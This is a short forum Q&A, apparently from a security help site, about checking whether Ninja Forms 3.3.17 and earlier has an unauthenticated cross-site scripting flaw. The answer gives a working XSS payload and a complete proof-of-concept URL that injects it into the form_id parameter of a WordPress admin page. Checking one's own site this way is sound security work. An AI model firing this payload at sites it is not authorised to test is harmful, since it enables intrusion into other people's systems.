+1 vote
Ninja Forms <= 3.3.17 is vulnerable to Unauthenticated Cross-Site Scripting. How can I check this?
by (111 points)

1 Answer

0 votes

You can check your site is vulnerable or not by inserting the payload 

"><script>alert(document.domain);</script>

in the "form_id" parameter like this.

http://wordpresssite/wp-admin/edit.php?post_status=all&post_type=nf_sub&form_id=1"><script>alert(document.domain);</script>&nf_form_filter&paged=1

by (184 points)
...